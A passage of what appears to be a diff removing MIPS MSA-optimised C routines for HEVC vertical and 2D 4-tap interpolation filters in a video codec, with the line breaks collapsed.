src32_r, src43_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - dst_val0 = __msa_copy_u_d((v2i64) dst0_r, 0); - dst_val1 = __msa_copy_u_d((v2i64) dst1_r, 0); - - dst_val_int0 = __msa_copy_u_w((v4i32) dst0_r, 2); - dst_val_int1 = __msa_copy_u_w((v4i32) dst1_r, 2); - - SD(dst_val0, dst); - SW(dst_val_int0, dst + 4); - dst += dst_stride; - SD(dst_val1, dst); - SW(dst_val_int1, dst + 4); - dst += dst_stride; - } -} - -static void hevc_vt_4t_8x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); -} - -static void hevc_vt_4t_8x6_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter) -{ - v16i8 src0, src1, src2, src3, src4; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); - dst += (2 * dst_stride); - - LD_SB2(src, src_stride, src1, src2); - src += (2 * src_stride); - XORI_B2_128_SB(src1, src2); - - ILVR_B2_SB(src1, src4, src2, src1, src10_r, src21_r); - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); - dst += (2 * dst_stride); - - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - - ST_SH2(dst0_r, dst1_r, dst, dst_stride); -} - -static void hevc_vt_4t_8x4multiple_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src10_r, src32_r, 
src21_r, src43_r, src54_r, src65_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src3, src4, src5, src6); - src += (4 * src_stride); - XORI_B4_128_SB(src3, src4, src5, src6); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVR_B2_SB(src5, src4, src6, src5, src54_r, src65_r); - dst0_r = const_vec; - dst1_r = const_vec; - dst2_r = const_vec; - dst3_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - DPADD_SB2_SH(src32_r, src54_r, filt0, filt1, dst2_r, dst2_r); - DPADD_SB2_SH(src43_r, src65_r, filt0, filt1, dst3_r, dst3_r); - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - dst += (4 * dst_stride); - - src2 = src6; - src10_r = src54_r; - src21_r = src65_r; - } -} - -static void hevc_vt_4t_8w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - if (2 == height) { - hevc_vt_4t_8x2_msa(src, src_stride, dst, dst_stride, filter); - } else if (6 == height) { - hevc_vt_4t_8x6_msa(src, src_stride, dst, dst_stride, filter); - } else { - hevc_vt_4t_8x4multiple_msa(src, src_stride, dst, dst_stride, - filter, height); - } -} - -static void hevc_vt_4t_12w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src10_r, src32_r, src21_r, src43_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src54_l, src21_l, src43_l, src65_l; - v16i8 src2110, src4332; - v16i8 src54_r, src65_r, src6554; - v8i16 dst0_l, dst1_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= (1 * src_stride); - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - src2110 = (v16i8) __msa_ilvr_d((v2i64) src21_l, (v2i64) src10_l); - - for (loop_cnt = 4; loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - LD_SB2(src, src_stride, src5, src6); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - XORI_B2_128_SB(src5, src6); - - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - src4332 = (v16i8) __msa_ilvr_d((v2i64) src43_l, (v2i64) src32_l); - ILVR_B2_SB(src5, src4, src6, src5, src54_r, src65_r); - ILVL_B2_SB(src5, src4, src6, src5, src54_l, src65_l); - src6554 = (v16i8) __msa_ilvr_d((v2i64) src65_l, (v2i64) src54_l); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst2_r = const_vec; - DPADD_SB2_SH(src32_r, src54_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src43_r, src65_r, filt0, filt1, dst3_r, 
dst3_r); - dst0_l = const_vec; - DPADD_SB2_SH(src2110, src4332, filt0, filt1, dst0_l, dst0_l); - dst1_l = const_vec; - DPADD_SB2_SH(src4332, src6554, filt0, filt1, dst1_l, dst1_l); - - ST_SH4(dst0_r, dst1_r, dst2_r, dst3_r, dst, dst_stride); - ST_D4(dst0_l, dst1_l, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - - src2 = src6; - src10_r = src54_r; - src21_r = src65_r; - src2110 = src6554; - } -} - -static void hevc_vt_4t_16w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5; - v16i8 src10_r, src32_r, src21_r, src43_r; - v16i8 src10_l, src32_l, src21_l, src43_l; - v8i16 dst0_r, dst1_r, dst0_l, dst1_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * src_stride); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - src += (2 * src_stride); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src10_l, src32_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src21_l, src43_l, filt0, filt1, dst1_l, dst1_l); - ST_SH2(dst0_r, dst0_l, dst, 8); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - dst += dst_stride; - - LD_SB2(src, src_stride, src5, src2); - src += (2 * src_stride); - XORI_B2_128_SB(src5, src2); - ILVR_B2_SB(src5, src4, src2, src5, src10_r, src21_r); - ILVL_B2_SB(src5, src4, src2, src5, src10_l, src21_l); - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src32_l, src10_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src43_l, src21_l, filt0, filt1, dst1_l, dst1_l); - ST_SH2(dst0_r, dst0_l, dst, 8); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_vt_4t_24w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5; - v16i8 src6, src7, src8, src9, src10, src11; - v16i8 src10_r, src32_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src21_l, src43_l; - v8i16 dst0_l, dst1_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - - LD_SB3(src + 16, src_stride, src6, src7, src8); - src += (3 * src_stride); - XORI_B3_128_SB(src6, src7, 
src8); - ILVR_B2_SB(src7, src6, src8, src7, src76_r, src87_r); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, src32_l, src43_l); - - LD_SB2(src + 16, src_stride, src9, src10); - src += (2 * src_stride); - XORI_B2_128_SB(src9, src10); - ILVR_B2_SB(src9, src8, src10, src9, src98_r, src109_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src10_l, src32_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src21_l, src43_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src76_r, src98_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src87_r, src109_r, filt0, filt1, dst3_r, dst3_r); - - ST_SH2(dst0_r, dst0_l, dst, 8); - ST_SH(dst2_r, dst + 16); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - ST_SH(dst3_r, dst + 16); - dst += dst_stride; - - LD_SB2(src, src_stride, src5, src2); - XORI_B2_128_SB(src5, src2); - ILVR_B2_SB(src5, src4, src2, src5, src10_r, src21_r); - ILVL_B2_SB(src5, src4, src2, src5, src10_l, src21_l); - - LD_SB2(src + 16, src_stride, src11, src8); - src += (2 * src_stride); - XORI_B2_128_SB(src11, src8); - ILVR_B2_SB(src11, src10, src8, src11, src76_r, src87_r); - - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src32_l, src10_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src43_l, src21_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src98_r, src76_r, filt0, filt1, dst2_r, dst2_r); - dst3_r = const_vec; - DPADD_SB2_SH(src109_r, src87_r, filt0, filt1, dst3_r, dst3_r); - - ST_SH2(dst0_r, dst0_l, dst, 8); - ST_SH(dst2_r, dst + 16); - dst += dst_stride; - ST_SH2(dst1_r, dst1_l, dst, 8); - ST_SH(dst3_r, dst + 16); - dst += dst_stride; - } -} - -static void hevc_vt_4t_32w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter, - int32_t height) -{ - int32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5; - v16i8 src6, src7, src8, src9, src10, src11; - v16i8 src10_r, src32_r, src76_r, src98_r; - v16i8 src21_r, src43_r, src87_r, src109_r; - v8i16 dst0_r, dst1_r, dst2_r, dst3_r; - v16i8 src10_l, src32_l, src76_l, src98_l; - v16i8 src21_l, src43_l, src87_l, src109_l; - v8i16 dst0_l, dst1_l, dst2_l, dst3_l; - v8i16 filt0, filt1; - v8i16 filter_vec, const_vec; - - src -= src_stride; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - LD_SB3(src, src_stride, src0, src1, src2); - XORI_B3_128_SB(src0, src1, src2); - ILVR_B2_SB(src1, src0, src2, src1, src10_r, src21_r); - ILVL_B2_SB(src1, src0, src2, src1, src10_l, src21_l); - - LD_SB3(src + 16, src_stride, src6, src7, src8); - src += (3 * src_stride); - XORI_B3_128_SB(src6, src7, src8); - ILVR_B2_SB(src7, src6, src8, src7, src76_r, src87_r); - ILVL_B2_SB(src7, src6, src8, src7, src76_l, src87_l); - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB2(src, src_stride, src3, src4); - XORI_B2_128_SB(src3, src4); - ILVR_B2_SB(src3, src2, src4, src3, src32_r, src43_r); - ILVL_B2_SB(src3, src2, src4, src3, 
src32_l, src43_l); - - LD_SB2(src + 16, src_stride, src9, src10); - src += (2 * src_stride); - XORI_B2_128_SB(src9, src10); - ILVR_B2_SB(src9, src8, src10, src9, src98_r, src109_r); - ILVL_B2_SB(src9, src8, src10, src9, src98_l, src109_l); - - dst0_r = const_vec; - DPADD_SB2_SH(src10_r, src32_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src10_l, src32_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src21_r, src43_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src21_l, src43_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src76_r, src98_r, filt0, filt1, dst2_r, dst2_r); - dst2_l = const_vec; - DPADD_SB2_SH(src76_l, src98_l, filt0, filt1, dst2_l, dst2_l); - dst3_r = const_vec; - DPADD_SB2_SH(src87_r, src109_r, filt0, filt1, dst3_r, dst3_r); - dst3_l = const_vec; - DPADD_SB2_SH(src87_l, src109_l, filt0, filt1, dst3_l, dst3_l); - - ST_SH4(dst0_r, dst0_l, dst2_r, dst2_l, dst, 8); - dst += dst_stride; - ST_SH4(dst1_r, dst1_l, dst3_r, dst3_l, dst, 8); - dst += dst_stride; - - LD_SB2(src, src_stride, src5, src2); - XORI_B2_128_SB(src5, src2); - ILVR_B2_SB(src5, src4, src2, src5, src10_r, src21_r); - ILVL_B2_SB(src5, src4, src2, src5, src10_l, src21_l); - - LD_SB2(src + 16, src_stride, src11, src8); - src += (2 * src_stride); - XORI_B2_128_SB(src11, src8); - ILVR_B2_SB(src11, src10, src8, src11, src76_r, src87_r); - ILVL_B2_SB(src11, src10, src8, src11, src76_l, src87_l); - - dst0_r = const_vec; - DPADD_SB2_SH(src32_r, src10_r, filt0, filt1, dst0_r, dst0_r); - dst0_l = const_vec; - DPADD_SB2_SH(src32_l, src10_l, filt0, filt1, dst0_l, dst0_l); - dst1_r = const_vec; - DPADD_SB2_SH(src43_r, src21_r, filt0, filt1, dst1_r, dst1_r); - dst1_l = const_vec; - DPADD_SB2_SH(src43_l, src21_l, filt0, filt1, dst1_l, dst1_l); - dst2_r = const_vec; - DPADD_SB2_SH(src98_r, src76_r, filt0, filt1, dst2_r, dst2_r); - dst2_l = const_vec; - DPADD_SB2_SH(src98_l, src76_l, filt0, filt1, dst2_l, dst2_l); - dst3_r = const_vec; - DPADD_SB2_SH(src109_r, src87_r, filt0, filt1, dst3_r, dst3_r); - dst3_l = const_vec; - DPADD_SB2_SH(src109_l, src87_l, filt0, filt1, dst3_l, dst3_l); - - ST_SH4(dst0_r, dst0_l, dst2_r, dst2_l, dst, 8); - dst += dst_stride; - ST_SH4(dst1_r, dst1_l, dst3_r, dst3_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_hv_4t_4x2_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 dst20, dst31, dst42, dst10, dst32, dst21, dst43; - v4i32 dst0, dst1; - - src -= (src_stride + 1); - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB5(src, src_stride, src0, src1, src2, src3, src4); - XORI_B5_128_SB(src0, src1, src2, src3, src4); - VSHF_B2_SB(src0, src2, src0, src2, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src3, src1, src3, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src4, src2, src4, mask0, mask1, vec4, vec5); - - dst20 = const_vec; - dst31 = const_vec; - dst42 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst20, dst20); - DPADD_SB2_SH(vec2, vec3, 
filt0, filt1, dst31, dst31); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst42, dst42); - ILVRL_H2_SH(dst31, dst20, dst10, dst32); - ILVRL_H2_SH(dst42, dst31, dst21, dst43); - - dst0 = HEVC_FILT_4TAP(dst10, dst32, filt_h0, filt_h1); - dst1 = HEVC_FILT_4TAP(dst21, dst43, filt_h0, filt_h1); - dst0 >>= 6; - dst1 >>= 6; - dst0 = (v4i32) __msa_pckev_h((v8i16) dst1, (v8i16) dst0); - ST_D2(dst0, 0, 1, dst, dst_stride); -} - -static void hevc_hv_4t_4x4_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - v16i8 mask1; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 filter_vec, const_vec; - v8i16 dst30, dst41, dst52, dst63, dst10, dst32, dst54, dst21, dst43, dst65; - v4i32 dst0, dst1, dst2, dst3; - - src -= (src_stride + 1); - - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB7(src, src_stride, src0, src1, src2, src3, src4, src5, src6); - XORI_B7_128_SB(src0, src1, src2, src3, src4, src5, src6); - - VSHF_B2_SB(src0, src3, src0, src3, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src4, src1, src4, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src2, src5, src2, src5, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src3, src6, src3, src6, mask0, mask1, vec6, vec7); - - dst30 = const_vec; - dst41 = const_vec; - dst52 = const_vec; - dst63 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst30, dst30); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst41, dst41); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst52, dst52); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst63, dst63); - - ILVRL_H2_SH(dst41, dst30, dst10, dst43); - ILVRL_H2_SH(dst52, dst41, dst21, dst54); - ILVRL_H2_SH(dst63, dst52, dst32, dst65); - - dst0 = HEVC_FILT_4TAP(dst10, dst32, filt_h0, filt_h1); - dst1 = HEVC_FILT_4TAP(dst21, dst43, filt_h0, filt_h1); - dst2 = HEVC_FILT_4TAP(dst32, dst54, filt_h0, filt_h1); - dst3 = HEVC_FILT_4TAP(dst43, dst65, filt_h0, filt_h1); - SRA_4V(dst0, dst1, dst2, dst3, 6); - PCKEV_H2_SW(dst1, dst0, dst3, dst2, dst0, dst2); - ST_D4(dst0, dst2, 0, 1, 0, 1, dst, dst_stride); -} - - -static void hevc_hv_4t_4multx8mult_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6; - v16i8 src7, src8, src9, src10; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 dst10, dst21, dst22, dst73, dst84, dst95, dst106; - v8i16 dst10_r, dst32_r, dst54_r, dst76_r, dst98_r; - v8i16 dst21_r, dst43_r, dst65_r, dst87_r, dst109_r; - v4i32 dst0, dst1, dst2, dst3, dst4, dst5, dst6, dst7; - - src -= (src_stride + 1); - filter_vec = LD_SH(filter_x); - SPLATI_H2_SH(filter_vec, 0, 1, filt0, filt1); - - filter_vec = LD_SH(filter_y); - UNPCK_R_SB_SH(filter_vec, filter_vec); - - SPLATI_W2_SH(filter_vec, 0, filt_h0, filt_h1); - - mask1 = mask0 + 2; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - LD_SB3(src, src_stride, src0, src1, src2); - src += (3 * 
src_stride); - XORI_B3_128_SB(src0, src1, src2); - VSHF_B2_SB(src0, src1, src0, src1, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src1, src2, src1, src2, mask0, mask1, vec2, vec3); - dst10 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst10, dst10); - dst21 = const_vec; - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst21, dst21); - ILVRL_H2_SH(dst21, dst10, dst10_r, dst21_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst21, 1); - - for (loop_cnt = height >> 3; loop_cnt--;) { - LD_SB8(src, src_stride, - src3, src4, src5, src6, src7, src8, src9, src10); - src += (8 * src_stride); - XORI_B8_128_SB(src3, src4, src5, src6, src7, src8, src9, src10); - - VSHF_B2_SB(src3, src7, src3, src7, mask0, mask1, vec0, vec1); - VSHF_B2_SB(src4, src8, src4, src8, mask0, mask1, vec2, vec3); - VSHF_B2_SB(src5, src9, src5, src9, mask0, mask1, vec4, vec5); - VSHF_B2_SB(src6, src10, src6, src10, mask0, mask1, vec6, vec7); - - dst73 = const_vec; - dst84 = const_vec; - dst95 = const_vec; - dst106 = const_vec; - DPADD_SB2_SH(vec0, vec1, filt0, filt1, dst73, dst73); - DPADD_SB2_SH(vec2, vec3, filt0, filt1, dst84, dst84); - DPADD_SB2_SH(vec4, vec5, filt0, filt1, dst95, dst95); - DPADD_SB2_SH(vec6, vec7, filt0, filt1, dst106, dst106); - - dst32_r = __msa_ilvr_h(dst73, dst22); - ILVRL_H2_SH(dst84, dst73, dst43_r, dst87_r); - ILVRL_H2_SH(dst95, dst84, dst54_r, dst98_r); - ILVRL_H2_SH(dst106, dst95, dst65_r, dst109_r); - dst22 = (v8i16) __msa_splati_d((v2i64) dst73, 1); - dst76_r = __msa_ilvr_h(dst22, dst106); - - dst0 = HEVC_FILT_4TAP(dst10_r, dst32_r, filt_h0, filt_h1); - dst1 = HEVC_FILT_4TAP(dst21_r, dst43_r, filt_h0, filt_h1); - dst2 = HEVC_FILT_4TAP(dst32_r, dst54_r, filt_h0, filt_h1); - dst3 = HEVC_FILT_4TAP(dst43_r, dst65_r, filt_h0, filt_h1); - dst4 = HEVC_FILT_4TAP(dst54_r, dst76_r, filt_h0, filt_h1); - dst5 = HEVC_FILT_4TAP(dst65_r, dst87_r, filt_h0, filt_h1); - dst6 = HEVC_FILT_4TAP(dst76_r, dst98_r, filt_h0, filt_h1); - dst7 = HEVC_FILT_4TAP(dst87_r, dst109_r, filt_h0, filt_h1); - SRA_4V(dst0, dst1, dst2, dst3, 6); - SRA_4V(dst4, dst5, dst6, dst7, 6); - PCKEV_H4_SW(dst1, dst0, dst3, dst2, dst5, dst4, dst7, dst6, - dst0, dst1, dst2, dst3); - ST_D8(dst0, dst1, dst2, dst3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - - dst10_r = dst98_r; - dst21_r = dst109_r; - dst22 = (v8i16) __msa_splati_d((v2i64) dst106, 1); - } -} - -static void hevc_hv_4t_4w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - if (2 == height) { - hevc_hv_4t_4x2_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (4 == height) { - hevc_hv_4t_4x4_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y); - } else if (0 == (height % 8)) { - hevc_hv_4t_4multx8mult_msa(src, src_stride, dst, dst_stride, - filter_x, filter_y, height); - } -} - -static void hevc_hv_4t_6w_msa(const uint8_t *src, - int32_t src_stride, - int16_t *dst, - int32_t dst_stride, - const int8_t *filter_x, - const int8_t *filter_y, - int32_t height) -{ - v16i8 src0, src1, src2, src3, src4, src5, src6, src7, src8, src9, src10; - v8i16 filt0, filt1; - v8i16 filt_h0, filt_h1; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - v16i8 mask1; - v8i16 filter_vec, const_vec; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5, vec6, vec7; - v8i16 dsth0, dsth1, dsth2, dsth3, dsth4, dsth5, dsth6, dsth7, dsth8, dsth9; - v8i16 dsth10, tmp0, tmp1, 